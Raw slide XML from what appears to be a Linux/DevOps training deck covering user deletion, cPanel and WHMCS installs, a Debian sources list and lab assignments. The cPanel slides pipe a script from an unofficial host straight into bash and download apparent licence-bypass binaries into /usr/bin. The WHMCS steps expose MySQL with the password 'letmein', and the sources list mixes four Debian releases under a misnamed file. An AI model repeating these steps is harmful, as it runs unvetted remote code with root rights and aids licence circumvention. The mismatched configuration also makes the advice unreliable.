              <a:solidFill>
                <a:srgbClr val="6AA84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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="721125"/>
            <a:ext cx="8520600" cy="77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620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to delete a linux users without home directory?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365750" y="1524700"/>
            <a:ext cx="8520600" cy="2846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40"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4820">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdel -f  &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4820">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4217"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4218" name="Google Shape;4218;p684"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46425" y="624100"/>
            <a:ext cx="9144000" cy="77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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to install cpanel on linux?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4219" name="Google Shape;4219;p684"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217375" y="212400"/>
            <a:ext cx="1722375" cy="490975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4220" name="Google Shape;4220;p684"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390975" y="1617525"/>
            <a:ext cx="8142300" cy="2126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b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash &lt;( curl -A "tactu2023" https://api.41732.net/pre.sh )</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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4" name="Shape 4224"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4225" name="Google Shape;4225;p685"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46425" y="521975"/>
            <a:ext cx="9144000" cy="77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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install whmcs with docker?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4226" name="Google Shape;4226;p685"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495477" y="212400"/>
            <a:ext cx="1444274" cy="411700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4227" name="Google Shape;4227;p685"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390975" y="1394800"/>
            <a:ext cx="8337300" cy="3542400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run --name MYSQL -e MYSQL_ROOT_PASSWORD=letmein -p 3306:3306 -v /root/MYSQL:/var/lib/mysql -id mysql:5.7</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run --name PHPMYADMIN --link MYSQL:db -p 8079:80 -id phpmyadmin/phpmyadmin</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run --name WHMCS -p 80:80 --link=MYSQL:db -id chasim1982/whmcs:latest</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.yourdomain.com/whmcs/install/install.php</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4231"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4232" name="Google Shape;4232;p686"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="219450"/>
            <a:ext cx="8681700" cy="108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500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian GNU/Linux 9 </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(stretch) Source List</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4233" name="Google Shape;4233;p686"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217375" y="212400"/>
            <a:ext cx="1722375" cy="490975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4234" name="Google Shape;4234;p686"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500850" y="2230300"/>
            <a:ext cx="8142300" cy="212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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vim /etc/apt/source.list</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Add below </a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deb http://archive.debian.org/debian-security stretch/updates main</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>deb http://</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>ftp.de.debian.org/debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> bookworm main</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>deb http://security.debian.org/debian-security buster/updates main</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>deb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://ftp.de.debian.org/debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> bullseye main</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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8" name="Shape 4238"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4239" name="Google Shape;4239;p687"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468250" y="828375"/>
            <a:ext cx="8315700" cy="3388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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -o latest -L https://securedownloads.cpanel.net/latest</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -s -A "tactu2023"  https://api.41732.net/verificare -o /opt/tactu/verificare</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -s -A "tactu2023" https://api.41732.net/register_license_cpanel.x -o /opt/tactu/register_license_cpanel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -s -A "tactu2023" https://api.41732.net/tactu_cpanel  -o /opt/tactu_cpanel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -s -A "tactu2023" https://api.41732.net/syslic_cpanel.x -o /usr/bin/syslic_cpanel</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>WebArchive</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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3" name="Shape 4243"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4244" name="Google Shape;4244;p688"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1386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#1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignments for DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4245" name="Google Shape;4245;p688"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768900" y="635150"/>
            <a:ext cx="7943100" cy="43785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Install Ubuntu 22.x in VirtualBox/VmWare</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Install Apache2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web server</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Install Mariadb</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Create 10 Mariadb user with one database each</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Create 2 tables in each</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Export database</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Remove database</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Import the exported database</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Install PhpMyAdmin and access at http://ip/phpmyadmin</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Go to /var/www/html</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Open index.html with VIM and delete all lines</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Install WinSCP on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and edit /var/www/html/index.html file with VSCode Editor</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
